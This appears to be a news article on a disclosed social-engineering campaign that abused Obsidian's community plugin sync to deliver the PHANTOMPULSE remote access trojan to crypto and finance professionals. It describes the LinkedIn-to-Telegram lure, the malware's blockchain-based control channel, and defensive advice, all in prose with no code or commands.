A newly disclosed malware campaign is targeting crypto and finance professionals by abusing the Obsidian notes app’s community plugin system, according to Elastic Security Labs. The attack does not exploit a software flaw in Obsidian itself. Instead, it uses social engineering on LinkedIn and Telegram, then tricks victims into opening a shared vault and enabling synced plugins that silently launch a remote access trojan called PHANTOMPULSE. That shift matters because it turns a trusted productivity workflow into the initial access point.
Elastic Security Labs published its report, “Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT,” on April 14, 2026. The researchers said the campaign specifically targeted people in crypto and finance and relied on a fake venture capital narrative to build trust before moving victims into Telegram chats and then into Obsidian-hosted content. Cointelegraph separately reported the same day that the operation used “elaborate” social engineering and worked across both Windows and macOS, reinforcing the core findings from Elastic’s primary research.
How the Obsidian malware scam works
The mechanics are unusually clever because the attackers appear to stay inside normal user behavior for as long as possible. Elastic said victims were first approached on LinkedIn by actors posing as a venture capital firm. The conversation then shifted to Telegram, where the attackers discussed cryptocurrency liquidity services to make the outreach look commercially plausible. From there, the target was told to use Obsidian as a shared company knowledge base and was given credentials to access a cloud-hosted vault controlled by the attackers.
That vault was the real trap. Once the victim opened it in Obsidian, the attackers instructed them to enable community plugin sync. According to Elastic, the synced plugins then executed the next stage of the attack chain without requiring the victim to download what looked like traditional malware. In other words, the campaign abused intended functionality rather than a classic exploit. That distinction is important for defenders because many security teams still prioritize vulnerability patching over workflow abuse and trust-based execution paths.
Elastic’s report said the campaign used trojanized plugins and named the malware family PHANTOMPULSE. The malware was described as a previously undocumented remote access trojan designed for stealth, resilience, and broad remote access. Penligent, summarizing the Elastic findings on April 15, 2026, said the malware included capabilities such as screenshots, keylogging, file execution, injection, uninstall routines, and privilege-related actions. Elastic also noted that the attack chain differed somewhat between Windows and macOS, but both paths ended in device compromise.
Why crypto users are being singled out
Crypto users remain a prime target because a compromised machine can expose wallets, seed phrases, exchange sessions, browser cookies, and messaging accounts tied to high-value transactions. Cointelegraph cited Chainalysis data showing that $713 million was stolen through compromises of individual crypto wallets in 2025. That figure gives useful context: attackers do not need to breach an exchange if they can compromise the people moving funds, negotiating deals, or managing treasury operations from their own devices.
What stands out in this campaign is the pretext. Instead of sending a phishing link with obvious red flags, the attackers built a business conversation around venture capital and liquidity services. That is tailored to the crypto sector’s real operating environment, where founders, traders, market makers, and treasury managers often move between LinkedIn, Telegram, shared docs, and note-taking tools. I have tracked crypto-targeted intrusion patterns for years, and that workflow mimicry is what makes this campaign more dangerous than generic wallet-drainer spam. It does not scream “scam” at first glance. It looks like work.
What makes PHANTOMPULSE different
The most unusual technical detail in Elastic’s report is the command-and-control design. The researchers said PHANTOMPULSE used a decentralized mechanism tied to at least three blockchain networks. Elastic described malware logic that parsed transaction input data from blockchain responses, removed the hexadecimal prefix, decoded the bytes, and then XOR-decrypted the result using the wallet address as a key. That means public blockchain data was being used as part of the malware’s control channel.
That matters for two reasons. First, it can make infrastructure takedowns harder because defenders are not dealing with a single conventional server endpoint. Second, it shows how threat actors are adapting crypto-native infrastructure for operational resilience. Cointelegraph reported the same point, noting that the malware used on-chain transaction data tied to a specific wallet to receive instructions. For security teams in digital assets, this is the bigger story competitors may miss: the campaign is not just targeting crypto users; it is borrowing crypto rails to stay hidden and flexible.
Obsidian is not “hacked,” but the trust model is under pressure
There is no evidence in the Elastic report that Obsidian itself was compromised or that the attackers exploited a vulnerability in the app. The campaign abused the community plugin ecosystem and user trust. That distinction should be made clearly because it changes the response. This is not mainly a patch-now story. It is a governance story around plugin permissions, shared vault hygiene, identity verification, and endpoint controls.
Obsidian’s plugin model has long raised security questions in the community because plugins can execute code. Public discussions in the Obsidian community over the past year have repeatedly warned that third-party plugins should be treated carefully, even when they are open source. Elastic’s findings now give that concern a concrete, high-value attack example. The lesson is simple: if a stranger asks you to install or sync plugins as part of a business conversation, that request should be treated with the same suspicion as a macro-enabled document or an unsigned executable.
How users and firms can reduce the risk
Crypto users should start with process controls. Do not accept unsolicited business workflows that require a new app, a shared vault, or plugin activation. Verify identities outside the original chat thread. If someone claims to represent a fund or market-making desk, confirm that through an official company domain, not only LinkedIn or Telegram. Disable unnecessary community plugins, and do not sync plugins from untrusted vaults.
For firms, endpoint telemetry matters. Elastic said it was able to block the attack, which suggests behavior-based detection can still catch the chain even when the initial steps look legitimate. Security teams should monitor for unusual parent-child process relationships involving Obsidian, shell execution spawned from note-taking software, and outbound traffic patterns that do not fit normal documentation workflows. On the policy side, treasury staff, deal teams, and executives should use hardened devices for wallet operations and high-risk communications.
The broader takeaway is uncomfortable but clear. Productivity software is becoming part of the attack surface for crypto. In this case, the attackers did not need a browser exploit or a wallet vulnerability. They needed trust, a believable pretext, and a plugin sync prompt.
Frequently Asked Questions
What is the new Obsidian malware scam?
It is a social engineering campaign disclosed by Elastic Security Labs on April 14, 2026. Attackers pose as a venture capital firm, move targets from LinkedIn to Telegram, then persuade them to open a shared Obsidian vault and enable community plugin sync, which triggers malware execution.
Does this mean Obsidian has a security vulnerability?
No public report says the attackers exploited a software flaw in Obsidian itself. Elastic said the campaign abused legitimate app features, especially the community plugin ecosystem and synced vault workflow, rather than a traditional vulnerability.
Who is being targeted in this campaign?
Elastic said the operation targeted people in crypto and finance. The lure centered on financial services and cryptocurrency liquidity solutions, which made the outreach look relevant to founders, traders, treasury staff, and investment professionals.
What is PHANTOMPULSE?
PHANTOMPULSE is the name Elastic gave to the remote access trojan delivered in the campaign. The malware is described as stealthy and resilient, with capabilities that include remote control, screenshots, keylogging, file execution, and other post-compromise actions.
Why is this especially dangerous for crypto users?
A compromised device can expose exchange sessions, wallet access, browser cookies, and sensitive communications. Chainalysis data cited by Cointelegraph shows $713 million was stolen through individual wallet compromises in 2025, which shows how valuable end-user access remains to attackers.
How can I protect myself?
Do not open shared vaults or enable plugins for unsolicited contacts. Verify business identities through official channels, keep community plugins to a minimum, use endpoint protection, and separate high-value wallet activity from general-purpose work devices whenever possible.
Conclusion
The Obsidian campaign is a reminder that crypto security threats are shifting from obvious phishing pages to workflow-native deception. Elastic’s April 14, 2026 report shows attackers can weaponize trust in collaboration tools without exploiting the app itself. For crypto users, that means security can no longer focus only on wallets and exchanges. The note-taking app, the chat handoff, the shared workspace, and the plugin prompt all matter now. In practical terms, the safest response is to treat any unsolicited productivity setup as a potential intrusion path until proven otherwise.
Leave a comment